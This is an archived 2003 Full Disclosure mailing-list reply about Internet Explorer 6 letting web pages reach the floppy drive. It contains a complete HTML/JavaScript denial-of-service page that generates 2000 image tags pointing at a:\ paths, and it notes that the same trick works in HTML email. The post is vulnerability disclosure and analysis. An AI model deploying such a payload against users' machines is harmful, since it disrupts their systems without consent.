Full Disclosure mailing list archives
RE: IE6 & Java 1.4.2_02 applet: Hardware stress on floppy drive
From: "Richard M. Smith" <rms () computerbytesman com>
Date: Tue, 21 Oct 2003 18:53:08 -0400
Here's a more general approach to using the floppy drive for a DoS attack on a Windows machine: <html> <head> </head> <body> <script> for(i = 1; i <= 2000; ++i) { document.writeln("<img src=a:\\foo" + i + ".gif width=1 height=1>"); } </script> </body> </html> The fundamental problem here is that a Web page using the http: protocol shouldn't be able to access HTML objects from a local system using the file: protocol. This same trick can be also used from an HTML email message, but the <img> tags will have to hardwired into the HTML message and not generated by script code. Richard -----Original Message----- From: Marc Schoenefeld [mailto:schonef () uni-muenster de] Sent: Tuesday, October 21, 2003 5:00 PM To: bugtraq () securityfocus com; full-disclosure () lists netsys com Subject: IE6 & Java 1.4.2_02 applet: Hardware stress on floppy drive -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, be prepared that your IE6 will be blocked if you run the java plugin (any 1.4.x including 1.4.2_02) with the following applet: http://www.illegalaccess.org/exploits/java/applet/MyFloppySucks.html ... _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- IE6 & Java 1.4.2_02 applet: Hardware stress on floppy drive Marc Schoenefeld (Oct 21)
- RE: IE6 & Java 1.4.2_02 applet: Hardware stress on floppy drive Richard M. Smith (Oct 21)